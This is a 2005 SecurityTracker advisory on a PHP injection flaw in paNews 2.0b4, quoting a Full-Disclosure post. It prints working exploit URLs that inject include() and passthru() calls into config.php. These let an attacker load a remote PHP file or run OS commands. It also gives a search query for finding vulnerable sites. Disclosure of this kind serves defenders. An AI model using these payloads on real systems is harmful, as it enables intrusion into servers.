SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   paNews Vendors:   PHP Arena
paNews Include File Error in 'config.php' Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1013254
SecurityTracker URL:  http://securitytracker.com/id/1013254
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 22 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.0b4
Description:   An input validation vulnerability was reported in paNews. A remote user can execute arbitrary commands on the target system.

If register_globals is set to 'on' in the 'php.ini' file and if the 'includes' directory is writable, then a remote user can submit a specially crafted URL to execute arbitrary PHP code on the target system. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL combination is provided:

http://[target]/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)

then:

http://[target]/panews/includes/config.php?nst=http://your/file.php

Another demonstratoin exploit URL combination is provided:

http://[target]/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)

then:

http://[target]/panews/includes/config.php?nst=id

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system. The code will run with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phparena.net/panews.php (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] paNews v2.0b4 - PHP Injection


------------5D411C1CBFD27F
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit





oooo   oooo oooooooo8 ooooooooooo
 8888o  88 888        88  888  88 
 88 888o88  888oooooo     888     
 88   8888         888    888     
o88o    88 o88oooo888    o888o    
********************************
**** Network security team *****
********* nst.e-nex.com ********
********************************
* Title: paNews v2.0b4
* Bug found by: nst
* Date: 20.02.2005
********************************

web: http://www.phparena.net/panews.php
google: allintitle:paNews v2.0b4

PHP Injection
Bug works only if:
1. register_globals=On
2. folder "includes" is writable

p.s. please disable - javascripts =-]

Example 1

http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)

then:

http://victim/panews/includes/config.php?nst=http://your/file.php


Example 2

http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)

then:

http://victim/panews/includes/config.php?nst=id
------------5D411C1CBFD27F
Content-Type: text/plain; name="paNews_v2.0b4.txt"
Content-transfer-encoding: base64
Content-Disposition: attachment; filename="paNews_v2.0b4.txt"

b29vbyAgIG9vb28gb29vb29vb284IG9vb29vb29vb29vIA0KIDg4ODhvICA4OCA4ODggICAg
ICAgIDg4ICA4ODggIDg4IA0KIDg4IDg4OG84OCAgODg4b29vb29vICAgICA4ODggICAgIA0K
IDg4ICAgODg4OCAgICAgICAgIDg4OCAgICA4ODggICAgIA0Kbzg4byAgICA4OCBvODhvb29v
ODg4ICAgIG84ODhvICAgIA0KKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioNCioq
KiogTmV0d29yayBzZWN1cml0eSB0ZWFtICoqKioqDQoqKioqKioqKiogbnN0LmUtbmV4LmNv
bSAqKioqKioqKg0KKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioNCiogVGl0bGU6
IHBhTmV3cyB2Mi4wYjQNCiogQnVnIGZvdW5kIGJ5OiBuc3QNCiogRGF0ZTogMjAuMDIuMjAw
NQ0KKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioNCg0Kd2ViOiBodHRwOi8vd3d3
LnBocGFyZW5hLm5ldC9wYW5ld3MucGhwDQpnb29nbGU6IGFsbGludGl0bGU6cGFOZXdzIHYy
LjBiNA0KDQpQSFAgSW5qZWN0aW9uDQpCdWcgd29ya3Mgb25seSBpZjoNCjEuIHJlZ2lzdGVy
X2dsb2JhbHM9T24NCjIuIGZvbGRlciAiaW5jbHVkZXMiIGlzIHdyaXRhYmxlDQoNCnAucy4g
cGxlYXNlIGRpc2FibGUgLSBqYXZhc2NyaXB0cyA9LV0NCg0KRXhhbXBsZSAxDQoNCmh0dHA6
Ly92aWN0aW0vcGFuZXdzL2luY2x1ZGVzL2FkbWluX3NldHVwLnBocD9hY2Nlc3NbXT1hZG1p
bnMmZG89dXBkYXRlc2V0cyZmb3JtW2NvbW1lbnRzXT0kbnN0JmZvcm1bYXV0b2FwcHJvdmVd
PSRuc3QmZGlzdmVyY2hlY2s9JG5zdCZpbnN0YWxsZWQ9JGFzZCZzaG93Y29weT1pbmNsdWRl
KCRuc3QpDQoNCnRoZW46DQoNCmh0dHA6Ly92aWN0aW0vcGFuZXdzL2luY2x1ZGVzL2NvbmZp
Zy5waHA/bnN0PWh0dHA6Ly95b3VyL2ZpbGUucGhwDQoNCg0KRXhhbXBsZSAyDQoNCmh0dHA6
Ly92aWN0aW0vcGFuZXdzL2luY2x1ZGVzL2FkbWluX3NldHVwLnBocD9hY2Nlc3NbXT1hZG1p
bnMmZG89dXBkYXRlc2V0cyZmb3JtW2NvbW1lbnRzXT0kbnN0JmZvcm1bYXV0b2FwcHJvdmVd
PSRuc3QmZGlzdmVyY2hlY2s9JG5zdCZpbnN0YWxsZWQ9JGFzZCZzaG93Y29weT1wYXNzdGhy
dSgkbnN0KQ0KDQp0aGVuOg0KDQpodHRwOi8vdmljdGltL3BhbmV3cy9pbmNsdWRlcy9jb25m
aWcucGhwP25zdD1pZA==
------------5D411C1CBFD27F
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

------------5D411C1CBFD27F--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC